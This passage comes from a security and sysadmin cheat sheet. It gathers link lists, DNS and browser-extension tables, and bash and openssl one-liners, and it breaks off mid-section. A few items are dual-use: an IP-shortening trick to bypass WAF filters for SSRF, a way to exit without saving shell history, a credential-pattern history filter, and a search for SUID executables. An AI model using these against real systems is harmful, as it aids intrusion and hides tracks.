✅ <a href="https://sekurak.pl/"><b>Sekurak</b></a> - about security, penetration tests, vulnerabilities and many others (PL/EN).<br>
✅ <a href="https://nfsec.pl/"><b>nf.sec</b></a> - basic aspects and mechanisms of Linux operating system security (PL).<br>
</p>
##### :black_small_square: Other/All-in-one
<p>
✅ <a href="https://changelog.com/"><b>Changelog</b></a> - is a community of hackers; news & podcasts for developers and hackers.<br>
</p>
#### Other Cheat Sheets [<sup>[TOC]</sup>](#anger-table-of-contents)
###### Build your own DNS Servers
<p>
✅ <a href="https://calomel.org/unbound_dns.html"><b>Unbound DNS Tutorial</b></a> - a validating, recursive, and caching DNS server.<br>
✅ <a href="https://www.ctrl.blog/entry/knot-dns-resolver-tutorial.html"><b>Knot Resolver on Fedora</b></a> - how to get faster and more secure DNS resolution with Knot Resolver on Fedora.<br>
✅ <a href="https://www.aaflalo.me/2018/10/tutorial-setup-dns-over-https-server/"><b>DNS-over-HTTPS</b></a> - tutorial to setup your own DNS-over-HTTPS (DoH) server.<br>
✅ <a href="https://hacks.mozilla.org/2018/05/a-cartoon-intro-to-dns-over-https/"><b>dns-over-https</b></a> - a cartoon intro to DNS over HTTPS.<br>
✅ <a href="https://www.aaflalo.me/2019/03/dns-over-tls/"><b>DNS-over-TLS</b></a> - following to your DoH server, setup your DNS-over-TLS (DoT) server.<br>
✅ <a href="https://zwischenzugs.com/2018/01/26/how-and-why-i-run-my-own-dns-servers/"><b>DNS Servers</b></a> - how (and why) i run my own DNS Servers.<br>
</p>
###### Build your own Certificate Authority
<p>
✅ <a href="https://jamielinux.com/docs/openssl-certificate-authority/"><b>OpenSSL Certificate Authority</b></a> - build your own certificate authority (CA) using the OpenSSL tools.<br>
✅ <a href="https://github.com/smallstep/certificates"><b>step-ca Certificate Authority</b></a> - build your own certificate authority (CA) using open source step-ca.<br>
</p>
###### Build your own System/Virtual Machine
<p>
✅ <a href="https://github.com/cfenollosa/os-tutorial"><b>os-tutorial</b></a> - how to create an OS from scratch.<br>
✅ <a href="https://justinmeiners.github.io/lc3-vm/"><b>Write your Own Virtual Machine</b></a> - how to write your own virtual machine (VM).<br>
✅ <a href="https://github.com/cirosantilli/x86-bare-metal-examples"><b>x86 Bare Metal Examples</b></a> - dozens of minimal operating systems to learn x86 system programming.<br>
✅ <a href="https://github.com/djhworld/simple-computer"><b>simple-computer</b></a> - the scott CPU from "But How Do It Know?" by J. Clark Scott.<br>
✅ <a href="https://littleosbook.github.io/"><b>littleosbook</b></a> - the little book about OS development.<br>
</p>
###### DNS Servers list (privacy)
| <b><u>IP</u></b> | <b><u>URL</u></b> |
| :------------------- | :-------------------------------------------------------------------------------------- |
| **`84.200.69.80`** | [dns.watch](https://dns.watch/) |
| **`94.247.43.254`** | [opennic.org](https://www.opennic.org/) |
| **`64.6.64.6`** | [verisign.com](https://www.verisign.com/en_US/security-services/public-dns/index.xhtml) |
| **`89.233.43.71`** | [censurfridns.dk](https://blog.uncensoreddns.org/) |
| **`1.1.1.1`** | [cloudflare.com](https://1.1.1.1/) |
| **`94.130.110.185`** | [dnsprivacy.at](https://dnsprivacy.at/) |
###### TOP Browser extensions
| <b><u>Extension name</u></b> | <b><u>Description</u></b> |
| :--------------------------- | :---------------------------------------------------------------------------- |
| **`IPvFoo`** | Display the server IP address and HTTPS information across all page elements. |
| **`FoxyProxy`** | Simplifies configuring browsers to access proxy-servers. |
| **`HTTPS Everywhere`** | Automatically use HTTPS security on many sites. |
| **`uMatrix`** | Point & click to forbid/allow any class of requests made by your browser. |
| **`uBlock Origin`** | An efficient blocker: easy on memory and CPU footprint. |
| **`Session Buddy`** | Manage browser tabs and bookmarks with ease. |
| **`SuperSorter`** | Sort bookmarks recursively, delete duplicates, merge folders, and more. |
| **`Clear Cache`** | Clear your cache and browsing data. |
| **`d3coder`** | Encoding/Decoding plugin for various types of encoding. |
| **`Web Developer`** | Adds a toolbar button with various web developer tools. |
| **`ThreatPinch Lookup`** | Add threat intelligence hover tool tips. |
###### TOP Burp extensions
| <b><u>Extension name</u></b> | <b><u>Description</u></b> |
| :----------------------------------- | :------------------------------------------------------------------------------ |
| **`Active Scan++`** | Extends Burp's active and passive scanning capabilities. |
| **`Autorize`** | Automatically detects authorization enforcement. |
| **`AuthMatrix`** | A simple matrix grid to define the desired levels of access privilege. |
| **`Logger++`** | Logs requests and responses for all Burp tools in a sortable table. |
| **`Bypass WAF`** | Adds headers useful for bypassing some WAF devices. |
| **`JSON Beautifier`** | Beautifies JSON content in the HTTP message viewer. |
| **`JSON Web Tokens`** | Enables Burp to decode and manipulate JSON web tokens. |
| **`CSP Auditor`** | Displays CSP headers for responses, and passively reports CSP weaknesses. |
| **`CSP-Bypass`** | Passively scans for CSP headers that contain known bypasses. |
| **`Hackvertor`** | Converts data using a tag-based configuration to apply various encoding. |
| **`HTML5 Auditor`** | Scans for usage of risky HTML5 features. |
| **`Software Vulnerability Scanner`** | Vulnerability scanner based on vulners.com audit API. |
| **`Turbo Intruder`** | Is a powerful bruteforcing tool. |
| **`Upload Scanner`** | Upload a number of different file types, laced with different forms of payload. |
###### Hack Mozilla Firefox address bar
In Firefox's address bar, you can limit results by typing special characters before or after your term:
- `^` - for matches in your browsing history
- `*` - for matches in your bookmarks.
- `%` - for matches in your currently open tabs.
- `#` - for matches in page titles.
- `@` - for matches in web addresses.
###### Chrome hidden commands
- `chrome://chrome-urls` - list of all commands
- `chrome://flags` - enable experiments and development features
- `chrome://interstitials` - errors and warnings
- `chrome://net-internals` - network internals (events, dns, cache)
- `chrome://network-errors` - network errors
- `chrome://net-export` - start logging future network activity to a file
- `chrome://safe-browsing` - safe browsing options
- `chrome://user-actions` - record all user actions
- `chrome://restart` - restart chrome
- `chrome://dino` - ERR_INTERNET_DISCONNECTED...
- `cache:<website-address>` - view the cached version of the web page
###### Bypass WAFs by Shortening IP Address (by [0xInfection](https://twitter.com/0xInfection))
IP addresses can be shortened by dropping the zeroes:
```
http://1.0.0.1 → http://1.1
http://127.0.0.1 → http://127.1
http://192.168.0.1 → http://192.168.1
http://0xC0A80001 or http://3232235521 → 192.168.0.1
http://192.168.257 → 192.168.1.1
http://192.168.516 → 192.168.2.4
```
> This bypasses WAF filters for SSRF, open-redirect, etc where any IP as input gets blacklisted.
For more information please see [How to Obscure Any URL](http://www.pc-help.org/obscure.htm) and [Magic IP Address Shortcuts](https://stuff-things.net/2014/09/25/magic-ip-address-shortcuts/).
###### Hashing, encryption and encoding (by [Michal Špaček](https://twitter.com/spazef0rze))
_Hashing_
plaintext :arrow_right: hash<br>
hash :no_entry: plaintext
_Symmetric encryption_
plaintext :arrow_right: :key: :arrow_right: ciphertext<br>
plaintext :arrow_left: :key: :arrow_left: ciphertext<br>
(:key: shared key)
_Asymmetric encryption_
plaintext :arrow_right: :key: :arrow_right: ciphertext<br>
plaintext :arrow_left: :part_alternation_mark: :arrow_left: ciphertext<br>
(:key: public key, :part_alternation_mark: private key)<br>
_Encoding_
text :arrow_right: encoded<br>
text :arrow_left: encoded
#### One-liners [<sup>[TOC]</sup>](#anger-table-of-contents)
##### Table of Contents
- [terminal](#tool-terminal)
- [busybox](#tool-busybox)
- [mount](#tool-mount)
- [fuser](#tool-fuser)
- [lsof](#tool-lsof)
- [ps](#tool-ps)
- [top](#tool-top)
- [vmstat](#tool-vmstat)
- [iostat](#tool-iostat)
- [strace](#tool-strace)
- [kill](#tool-kill)
- [find](#tool-find)
- [diff](#tool-diff)
- [vimdiff](#tool-vimdiff)
- [tail](#tool-tail)
- [cpulimit](#tool-cpulimit)
- [pwdx](#tool-pwdx)
- [tr](#tool-tr)
- [chmod](#tool-chmod)
- [who](#tool-who)
- [last](#tool-last)
- [screen](#tool-screen)
- [script](#tool-script)
- [du](#tool-du)
- [inotifywait](#tool-inotifywait)
- [openssl](#tool-openssl)
- [secure-delete](#tool-secure-delete)
- [dd](#tool-dd)
- [gpg](#tool-gpg)
- [system-other](#tool-system-other)
- [curl](#tool-curl)
- [httpie](#tool-httpie)
- [ssh](#tool-ssh)
- [linux-dev](#tool-linux-dev)
- [tcpdump](#tool-tcpdump)
- [tcpick](#tool-tcpick)
- [ngrep](#tool-ngrep)
- [hping3](#tool-hping3)
- [nmap](#tool-nmap)
- [netcat](#tool-netcat)
- [socat](#tool-socat)
- [p0f](#tool-p0f)
- [gnutls-cli](#tool-gnutls-cli)
- [netstat](#tool-netstat)
- [rsync](#tool-rsync)
- [host](#tool-host)
- [dig](#tool-dig)
- [certbot](#tool-certbot)
- [network-other](#tool-network-other)
- [git](#tool-git)
- [awk](#tool-awk)
- [sed](#tool-sed)
- [grep](#tool-grep)
- [perl](#tool-perl)
##### Tool: [terminal](https://en.wikipedia.org/wiki/Linux_console)
###### Reload shell without exit
```bash
exec $SHELL -l
```
###### Close shell keeping all subprocess running
```bash
disown -a && exit
```
###### Exit without saving shell history
```bash
kill -9 $$
unset HISTFILE && exit
```
###### Perform a branching conditional
```bash
true && echo success
false || echo failed
```
###### Pipe stdout and stderr to separate commands
```bash
some_command > >(/bin/cmd_for_stdout) 2> >(/bin/cmd_for_stderr)
```
###### Redirect stdout and stderr each to separate files and print both to the screen
```bash
(some_command 2>&1 1>&3 | tee errorlog ) 3>&1 1>&2 | tee stdoutlog
```
###### List of commands you use most often
```bash
history | \
awk '{CMD[$2]++;count++;}END { for (a in CMD)print CMD[a] " " CMD[a]/count*100 "% " a;}' | \
grep -v "./" | \
column -c3 -s " " -t | \
sort -nr | nl | head -n 20
```
###### Sterilize bash history
```bash
function sterile() {
history | awk '$2 != "history" { $1=""; print $0 }' | egrep -vi "\
curl\b+.*(-E|--cert)\b+.*\b*|\
curl\b+.*--pass\b+.*\b*|\
curl\b+.*(-U|--proxy-user).*:.*\b*|\
curl\b+.*(-u|--user).*:.*\b*
.*(-H|--header).*(token|auth.*)\b+.*|\
wget\b+.*--.*password\b+.*\b*|\
http.?://.+:.+@.*\
" > $HOME/histbuff; history -r $HOME/histbuff;
}
export PROMPT_COMMAND="sterile"
```
> Look also: [A naive utility to censor credentials in command history](https://github.com/lbonanomi/go/blob/master/revisionist.go).
###### Quickly backup a file
```bash
cp filename{,.orig}
```
###### Empty a file (truncate to 0 size)
```bash
>filename
```
###### Delete all files in a folder that don't match a certain file extension
```bash
rm !(*.foo|*.bar|*.baz)
```
###### Pass multi-line string to a file
```bash
# cat >filename ... - overwrite the file
# cat >>filename ... - append to a file
cat > filename << __EOF__
data data data
__EOF__
```
###### Edit a file on a remote host using vim
```bash
vim scp://user@host//etc/fstab
```
###### Create a directory and change into it at the same time
```bash
mkd() { mkdir -p "$@" && cd "$@"; }
```
###### Convert uppercase files to lowercase files
```bash
rename 'y/A-Z/a-z/' *
```
###### Print a row of characters across the terminal
```bash
printf "%`tput cols`s" | tr ' ' '#'
```
###### Show shell history without line numbers
```bash
history | cut -c 8-
fc -l -n 1 | sed 's/^\s*//'
```
###### Run command(s) after exit session
```bash
cat > /etc/profile << __EOF__
_after_logout() {
username=$(whoami)
for _pid in $(ps afx | grep sshd | grep "$username" | awk '{print $1}') ; do
kill -9 $_pid
done
}
trap _after_logout EXIT
__EOF__
```
###### Generate a sequence of numbers
```bash
for ((i=1; i<=10; i+=2)) ; do echo $i ; done
# alternative: seq 1 2 10
for ((i=5; i<=10; ++i)) ; do printf '%02d\n' $i ; done
# alternative: seq -w 5 10
for i in {1..10} ; do echo $i ; done
```
###### Simple Bash filewatching
```bash
unset MAIL; export MAILCHECK=1; export MAILPATH='$FILE_TO_WATCH?$MESSAGE'
```
---
##### Tool: [busybox](https://www.busybox.net/)
###### Static HTTP web server
```bash
busybox httpd -p $PORT -h $HOME [-c httpd.conf]
```
---
##### Tool: [mount](<https://en.wikipedia.org/wiki/Mount_(Unix)>)
###### Mount a temporary ram partition
```bash
mount -t tmpfs tmpfs /mnt -o size=64M
```
- `-t` - filesystem type
- `-o` - mount options
###### Remount a filesystem as read/write
```bash
mount -o remount,rw /
```
---
##### Tool: [fuser](<https://en.wikipedia.org/wiki/Fuser_(Unix)>)
###### Show which processes use the files/directories
```bash
fuser /var/log/daemon.log
fuser -v /home/supervisor
```
###### Kills a process that is locking a file
```bash
fuser -ki filename
```
- `-i` - interactive option
###### Kills a process that is locking a file with specific signal
```bash
fuser -k -HUP filename
```
- `--list-signals` - list available signal names
###### Show what PID is listening on specific port
```bash
fuser -v 53/udp
```
###### Show all processes using the named filesystems or block device
```bash
fuser -mv /var/www
```
---
##### Tool: [lsof](https://en.wikipedia.org/wiki/Lsof)
###### Show process that use internet connection at the moment
```bash
lsof -P -i -n
```
###### Show process that use specific port number
```bash
lsof -i tcp:443
```
###### Lists all listening ports together with the PID of the associated process
```bash
lsof -Pan -i tcp -i udp
```
###### List all open ports and their owning executables
```bash
lsof -i -P | grep -i "listen"
```
###### Show all open ports
```bash
lsof -Pnl -i
```
###### Show open ports (LISTEN)
```bash
lsof -Pni4 | grep LISTEN | column -t
```
###### List all files opened by a particular command
```bash
lsof -c "process"
```
###### View user activity per directory
```bash
lsof -u username -a +D /etc
```
###### Show 10 largest open files
```bash
lsof / | \
awk '{ if($7 > 1048576) print $7/1048576 "MB" " " $9 " " $1 }' | \
sort -n -u | tail | column -t
```
###### Show current working directory of a process
```bash
lsof -p <PID> | grep cwd
```
---
##### Tool: [ps](<https://en.wikipedia.org/wiki/Ps_(Unix)>)
###### Show a 4-way scrollable process tree with full details
```bash
ps awwfux | less -S
```
###### Processes per user counter
```bash
ps hax -o user | sort | uniq -c | sort -r
```
###### Show all processes by name with main header
```bash
ps -lfC nginx
```
---
##### Tool: [find](<https://en.wikipedia.org/wiki/Find_(Unix)>)
###### Find files that have been modified on your system in the past 60 minutes
```bash
find / -mmin 60 -type f
```
###### Find all files larger than 20M
```bash
find / -type f -size +20M
```
###### Find duplicate files (based on MD5 hash)
```bash
find -type f -exec md5sum '{}' ';' | sort | uniq --all-repeated=separate -w 33
```
###### Change permission only for files
```bash
cd /var/www/site && find . -type f -exec chmod 766 {} \;
cd /var/www/site && find . -type f -exec chmod 664 {} +
```
###### Change permission only for directories
```bash
cd /var/www/site && find . -type d -exec chmod g+x {} \;
cd /var/www/site && find . -type d -exec chmod g+rwx {} +
```
###### Find files and directories for specific user/group
```bash
# User:
find . -user <username> -print
find /etc -type f -user <username> -name "*.conf"
# Group:
find /opt -group <group>
find /etc -type f -group <group> -iname "*.conf"
```
###### Find files and directories for all without specific user/group
```bash
# User:
find . \! -user <username> -print
# Group:
find . \! -group <group>
```
###### Looking for files/directories that only have certain permission
```bash
# User
find . -user <username> -perm -u+rw # -rw-r--r--
find /home -user $(whoami) -perm 777 # -rwxrwxrwx
# Group:
find /home -type d -group <group> -perm 755 # -rwxr-xr-x
```
###### Delete older files than 60 days
```bash
find . -type f -mtime +60 -delete
```
###### Recursively remove all empty sub-directories from a directory
```bash
find . -depth -type d -empty -exec rmdir {} \;
```
###### How to find all hard links to a file
```bash
find </path/to/dir> -xdev -samefile filename
```
###### Recursively find the latest modified files
```bash
find . -type f -exec stat --format '%Y :%y %n' "{}" \; | sort -nr | cut -d: -f2- | head
```
###### Recursively find/replace of a string with sed
```bash
find . -not -path '*/\.git*' -type f -print0 | xargs -0 sed -i 's/foo/bar/g'
```
###### Recursively find/replace of a string in directories and file names
```bash
find . -depth -name '*test*' -execdir bash -c 'mv -v "$1" "${1//foo/bar}"' _ {} \;
```
###### Recursively find suid executables
```bash
find / \( -perm -4000 -o -perm -2000 \) -type f -exec ls -la {} \;
```
---
##### Tool: [top](<https://en.wikipedia.org/wiki/Top_(software)>)
###### Use top to monitor only all processes with the specific string
```bash
top -p $(pgrep -d , <str>)
```
- `<str>` - process containing string (eg. nginx, worker)
---
##### Tool: [vmstat](https://en.wikipedia.org/wiki/Vmstat)
###### Show current system utilization (fields in kilobytes)
```bash
vmstat 2 20 -t -w
```
- `2` - number of times with a defined time interval (delay)
- `20` - each execution of the command (count)
- `-t` - show timestamp
- `-w` - wide output
- `-S M` - output of the fields in megabytes instead of kilobytes
###### Show current system utilization will get refreshed every 5 seconds
```bash
vmstat 5 -w
```
###### Display report a summary of disk operations
```bash
vmstat -D
```
###### Display report of event counters and memory stats
```bash
vmstat -s
```
###### Display report about kernel objects stored in slab layer cache
```bash
vmstat -m
```
##### Tool: [iostat](https://en.wikipedia.org/wiki/Iostat)
###### Show information about the CPU usage, and I/O statistics about all the partitions
```bash
iostat 2 10 -t -m
```
- `2` - number of times with a defined time interval (delay)
- `10` - each execution of the command (count)
- `-t` - show timestamp
- `-m` - fields in megabytes (`-k` - in kilobytes, default)
###### Show information only about the CPU utilization
```bash
iostat 2 10 -t -m -c
```
###### Show information only about the disk utilization
```bash
iostat 2 10 -t -m -d
```
###### Show information only about the LVM utilization
```bash
iostat -N
```
---
##### Tool: [strace](https://en.wikipedia.org/wiki/Strace)
###### Track with child processes
```bash
# 1)
strace -f -p $(pidof glusterfsd)
# 2)
strace -f $(pidof php-fpm | sed 's/\([0-9]*\)/\-p \1/g')
```
###### Track process with 30 seconds limit
```bash
timeout 30 strace $(< /var/run/zabbix/zabbix_agentd.pid)
```
###### Track processes and redirect output to a file
```bash
ps auxw | grep '[a]pache' | awk '{print " -p " $2}' | \
xargs strace -o /tmp/strace-apache-proc.out
```
###### Track with print time spent in each syscall and limit length of print strings
```bash
ps auxw | grep '[i]init_policy' | awk '{print " -p " $2}' | \
xargs strace -f -e trace=network -T -s 10000
```
###### Track the open request of a network port
```bash
strace -f -e trace=bind nc -l 80
```
###### Track the open request of a network port (show TCP/UDP)
```bash
strace -f -e trace=network nc -lu 80
```
---
##### Tool: [kill](<https://en.wikipedia.org/wiki/Kill_(command)>)
###### Kill a process running on port
```bash
kill -9 $(lsof -i :<port> | awk '{l=$2} END {print l}')
```
---
##### Tool: [diff](https://en.wikipedia.org/wiki/Diff)
###### Compare two directory trees
```bash
diff <(cd directory1 && find | sort) <(cd directory2 && find | sort)
```
###### Compare output of two commands
```bash
diff <(cat /etc/passwd) <(cut -f2 /etc/passwd)
```
---
##### Tool: [vimdiff](http://vimdoc.sourceforge.net/htmldoc/diff.html)
###### Highlight the exact differences, based on characters and words
```bash
vimdiff file1 file2
```
###### Compare two JSON files
```bash
vimdiff <(jq -S . A.json) <(jq -S . B.json)
```
###### Compare Hex dump
```bash
d(){ vimdiff <(f $1) <(f $2);};f(){ hexdump -C $1|cut -d' ' -f3-|tr -s ' ';}; d ~/bin1 ~/bin2
```
###### diffchar
Save [diffchar](https://raw.githubusercontent.com/vim-scripts/diffchar.vim/master/plugin/diffchar.vim) @ `~/.vim/plugins`
Click `F7` to switch between diff modes
Usefull `vimdiff` commands:
- `qa` to exit all windows
- `:vertical resize 70` to resize window
- set window width `Ctrl+W [N columns]+(Shift+)<\>`
---
##### Tool: [tail](<https://en.wikipedia.org/wiki/Tail_(Unix)>)
###### Annotate tail -f with timestamps
```bash
tail -f file | while read ; do echo "$(date +%T.%N) $REPLY" ; done
```
###### Analyse an Apache access log for the most common IP addresses
```bash
tail -10000 access_log | awk '{print $1}' | sort | uniq -c | sort -n | tail
```
###### Analyse web server log and show only 5xx http codes
```bash
tail -n 100 -f /path/to/logfile | grep "HTTP/[1-2].[0-1]\" [5]"
```
---
##### Tool: [tar](<https://en.wikipedia.org/wiki/Tar_(computing)>)
###### System backup with exclude specific directories
```bash
cd /
tar -czvpf /mnt/system$(date +%d%m%Y%s).tgz --directory=/ \
--exclude=proc/* --exclude=sys/* --exclude=dev/* --exclude=mnt/* .
```
###### System backup with exclude specific directories (pigz)
```bash
cd /
tar cvpf /backup/snapshot-$(date +%d%m%Y%s).tgz --directory=/ \
--exclude=proc/* --exclude=sys/* --exclude=dev/* \
--exclude=mnt/* --exclude=tmp/* --use-compress-program=pigz .
```
---
##### Tool: [dump](<https://en.wikipedia.org/wiki/Dump_(program)>)
###### System backup to file
```bash
dump -y -u -f /backup/system$(date +%d%m%Y%s).lzo /
```
###### Restore system from lzo file
```bash
cd /
restore -rf /backup/system$(date +%d%m%Y%s).lzo
```
---
##### Tool: [cpulimit](http://cpulimit.sourceforge.net/)
###### Limit the cpu usage of a process
```bash
cpulimit -p pid -l 50
```
---
##### Tool: [pwdx](https://www.cyberciti.biz/faq/unix-linux-pwdx-command-examples-usage-syntax/)
###### Show current working directory of a process
```bash
pwdx <pid>
```
---
##### Tool: [taskset](https://www.cyberciti.biz/faq/taskset-cpu-affinity-command/)
###### Start a command on only one CPU core
```bash
taskset -c 0 <command>
```
---
##### Tool: [tr](<https://en.wikipedia.org/wiki/Tr_(Unix)>)
###### Show directories in the PATH, one per line
```bash
tr : '\n' <<<$PATH
```
---
##### Tool: [chmod](https://en.wikipedia.org/wiki/Chmod)
###### Remove executable bit from all files in the current directory
```bash
chmod -R -x+X *
```
###### Restore permission for /bin/chmod
```bash
# 1:
cp /bin/ls chmod.01
cp /bin/chmod chmod.01
./chmod.01 700 file
# 2:
/bin/busybox chmod 0700 /bin/chmod
# 3:
setfacl --set u::rwx,g::---,o::--- /bin/chmod
```
---
##### Tool: [who](<https://en.wikipedia.org/wiki/Who_(Unix)>)
###### Find last reboot time
```bash
who -b
```
###### Detect a user sudo-su'd into the current shell
```bash
[[ $(who -m | awk '{ print $1 }') == $(whoami) ]] || echo "You are su-ed to $(whoami)"
```
---
##### Tool: [last](https://www.howtoforge.com/linux-last-command/)
###### Was the last reboot a panic?
```bash
(last -x -f $(ls -1t /var/log/wtmp* | head -2 | tail -1); last -x -f /var/log/wtmp) | \
grep -A1 reboot | head -2 | grep -q shutdown && echo "Expected reboot" || echo "Panic reboot"
```
---
##### Tool: [screen](https://en.wikipedia.org/wiki/GNU_Screen)
###### Start screen in detached mode
```bash
screen -d -m <command>
```
###### Attach to an existing screen session
```bash
screen -r -d <pid>
```
---
##### Tool: [script](<https://en.wikipedia.org/wiki/Script_(Unix)>)
###### Record and replay terminal session
```bash
### Record session
# 1)
script -t 2>~/session.time -a ~/session.log
# 2)
script --timing=session.time session.log
### Replay session
scriptreplay --timing=session.time session.log
```
---
##### Tool: [du](https://en.wikipedia.org/wiki/GNU_Screen)
###### Show 20 biggest directories with 'K M G'
```bash
du | \
sort -r -n | \
awk '{split("K M G",v); s=1; while($1>1024){$1/=1024; s++} print int($1)" "v[s]"\t"$2}' | \
head -n 20
```
---
##### Tool: [inotifywait](https://en.wikipedia.org/wiki/GNU_Screen)
###### Init tool everytime a file in a directory is modified
```bash
while true ; do inotifywait -r -e MODIFY dir/ && ls dir/ ; done;
```
---
##### Tool: [openssl](https://www.openssl.org/)
###### Testing connection to the remote host
```bash
echo | openssl s_client -connect google.com:443 -showcerts
```
###### Testing connection to the remote host (debug mode)
```bash
echo | openssl s_client -connect google.com:443 -showcerts -tlsextdebug -status
```
###### Testing connection to the remote host (with SNI support)
```bash
echo | openssl s_client -showcerts -servername google.com -connect google.com:443
```
###### Testing connection to the remote host with specific ssl version
```bash
openssl s_client -tls1_2 -connect google.com:443
```
###### Testing connection to the remote host with specific ssl cipher
```bash
openssl s_client -cipher 'AES128-SHA' -connect google.com:443
```
###### Verify 0-RTT
```bash
_host="example.com"
cat > req.in << __EOF__
HEAD / HTTP/1.1
Host: $_host
Connection: close
__EOF__
openssl s_client -connect ${_host}:443 -tls1_3 -sess_out session.pem -ign_eof < req.in
openssl s_client -connect ${_host}:443 -tls1_3 -sess_in session.pem -early_data req.in
```
###### Generate private key without passphrase
```bash
# _len: 2048, 4096
( _fd="private.key" ; _len="2048" ; \
openssl genrsa -out ${_fd} ${_len} )
```
###### Generate private key with passphrase
```bash
# _ciph: des3, aes128, aes256
# _len: 2048, 4096
( _ciph="aes128" ; _fd="private.key" ; _len="2048" ; \
openssl genrsa -${_ciph} -out ${_fd} ${_len} )
```
###### Remove passphrase from private key
```bash
( _fd="private.key" ; _fd_unp="private_unp.key" ; \
openssl rsa -in ${_fd} -out ${_fd_unp} )
```
###### Encrypt existing private key with a passphrase
```bash
# _ciph: des3, aes128, aes256
( _ciph="aes128" ; _fd="private.key" ; _fd_pass="private_pass.key" ; \
openssl rsa -${_ciph} -in ${_fd} -out ${_fd_pass}
```
###### Check private key
```bash
( _fd="private.key" ; \
openssl rsa -check -in ${_fd} )
```
###### Get public key from private key
```bash
( _fd="private.key" ; _fd_pub="public.key" ; \
openssl rsa -pubout -in ${_fd} -out ${_fd_pub} )
```
###### Generate private key and CSR
```bash
( _fd="private.key" ; _fd_csr="request.csr" ; _len="2048" ; \
openssl req -out ${_fd_csr} -new -newkey rsa:${_len} -nodes -keyout ${_fd} )
```
###### Generate CSR
```bash
( _fd="private.key" ; _fd_csr="request.csr" ; \
openssl req -out ${_fd_csr} -new -key ${_fd} )
```
###### Generate CSR (metadata from existing certificate)
> Where `private.key` is the existing private key. As you can see you do not generate this CSR from your certificate (public key). Also you do not generate the "same" CSR, just a new one to request a new certificate.
```bash
( _fd="private.key" ; _fd_csr="request.csr" ; _fd_crt="cert.crt" ; \
openssl x509 -x509toreq -in ${_fd_crt} -out ${_fd_csr} -signkey ${_fd} )
```
###### Generate CSR with -config param
```bash
( _fd="private.key" ; _fd_csr="request.csr" ; \
openssl req -new -sha256 -key ${_fd} -out ${_fd_csr} \
-config <(
cat << __EOF__
[req]
default_bits = 2048
default_md = sha256
prompt = no
distinguished_name = dn
req_extensions = req_ext
[ dn ]
C = "<two-letter ISO abbreviation for your country>"
ST = "<state or province where your organisation is legally located>"
L = "<city where your organisation is legally located>"
O = "<legal name of your organisation>"
OU = "<section of the organisation>"
CN = "<fully qualified domain name>"
[ req_ext ]
subjectAltName = @alt_names
[ alt_names ]
DNS.1 = <fully qualified domain name>
DNS.2 = <next domain>
DNS.3 = <next domain>
__EOF__
))
```
Other values in `[ dn ]`:
```
countryName = "DE" # C=
stateOrProvinceName = "Hessen" # ST=
localityName = "Keller" # L=
postalCode = "424242" # L/postalcode=
postalAddress = "Keller" # L/postaladdress=
streetAddress = "Crater 1621" # L/street=
organizationName = "apfelboymschule" # O=
organizationalUnitName = "IT Department" # OU=
commonName = "example.com" # CN=
emailAddress = "webmaster@example.com" # CN/emailAddress=
```
Example of `oids` (you'll probably also have to make OpenSSL know about the new fields required for EV by adding the following under `[new_oids]`):
```
[req]
...
oid_section = new_oids
[ new_oids ]
postalCode = 2.5.4.17
streetAddress = 2.5.4.9
```
For more information please look at these great explanations:
- [RFC 5280](https://tools.ietf.org/html/rfc5280)
- [How to create multidomain certificates using config files](https://apfelboymchen.net/gnu/notes/openssl%20multidomain%20with%20config%20files.html)
- [Generate a multi domains certificate using config files](https://gist.github.com/romainnorberg/464758a6620228b977212a3cf20c3e08)
- [Your OpenSSL CSR command is out of date](https://expeditedsecurity.com/blog/openssl-csr-command/)
- [OpenSSL example configuration file](https://www.tbs-certificats.com/openssl-dem-server-cert.cnf)
###### List available EC curves
```bash
openssl ecparam -list_curves
```
###### Print ECDSA private and public keys
```bash
( _fd="private.key" ; \
openssl ec -in ${_fd} -noout -text )
# For x25519 only extracting public key
( _fd="private.key" ; _fd_pub="public.key" ; \
openssl pkey -in ${_fd} -pubout -out ${_fd_pub} )
```
###### Generate ECDSA private key
```bash
# _curve: prime256v1, secp521r1, secp384r1
( _fd="private.key" ; _curve="prime256v1" ; \
openssl ecparam -out ${_fd} -name ${_curve} -genkey )
# _curve: X25519
( _fd="private.key" ; _curve="x25519" ; \
openssl genpkey -algorithm ${_curve} -out ${_fd} )
```
###### Generate private key and CSR (ECC)
```bash
# _curve: prime256v1, secp521r1, secp384r1
( _fd="domain.com.key" ; _fd_csr="domain.com.csr" ; _curve="prime256v1" ; \
openssl ecparam -out ${_fd} -name ${_curve} -genkey ; \
openssl req -new -key ${_fd} -out ${_fd_csr} -sha256 )
```
###### Generate self-signed certificate
```bash
# _len: 2048, 4096
( _fd="domain.key" ; _fd_out="domain.crt" ; _len="2048" ; _days="365" ; \
openssl req -newkey rsa:${_len} -nodes \
-keyout ${_fd} -x509 -days ${_days} -out ${_fd_out} )
```
###### Generate self-signed certificate from existing private key
```bash
# _len: 2048, 4096
( _fd="domain.key" ; _fd_out="domain.crt" ; _days="365" ; \
openssl req -key ${_fd} -nodes \
-x509 -days ${_days} -out ${_fd_out} )
```
###### Generate self-signed certificate from existing private key and csr
```bash
# _len: 2048, 4096
( _fd="domain.key" ; _fd_csr="domain.csr" ; _fd_out="domain.crt" ; _days="365" ; \
openssl x509 -signkey ${_fd} -nodes \
-in ${_fd_csr} -req -days ${_days} -out ${_fd_out} )
```
###### Generate DH public parameters
```bash
( _dh_size="2048" ; \
openssl dhparam -out /etc/nginx/ssl/dhparam_${_dh_size}.pem "$_dh_size" )
```
###### Display DH public parameters
```bash
openssl pkeyparam -in dhparam.pem -text
```
###### Extract private key from pfx
```bash
( _fd_pfx="cert.pfx" ; _fd_key="key.pem" ; \
openssl pkcs12 -in ${_fd_pfx} -nocerts -nodes -out ${_fd_key} )
```
###### Extract private key and certs from pfx
```bash
( _fd_pfx="cert.pfx" ; _fd_pem="key_certs.pem" ; \
openssl pkcs12 -in ${_fd_pfx} -nodes -out ${_fd_pem} )
```
###### Extract certs from p7b
```bash
# PKCS#7 file doesn't include private keys.
( _fd_p7b="cert.p7b" ; _fd_pem="cert.pem" ; \
openssl pkcs7 -inform DER -outform PEM -in ${_fd_p7b} -print_certs > ${_fd_pem})
# or:
openssl pkcs7 -print_certs -in -in ${_fd_p7b} -out ${_fd_pem})
```
###### Convert DER to PEM
```bash
( _fd_der="cert.crt" ; _fd_pem="cert.pem" ; \
openssl x509 -in ${_fd_der} -inform der -outform pem -out ${_fd_pem} )
```
###### Convert PEM to DER
```bash
( _fd_der="cert.crt" ; _fd_pem="cert.pem" ; \
openssl x509 -in ${_fd_pem} -outform der -out ${_fd_der} )
```
###### Verification of the private key
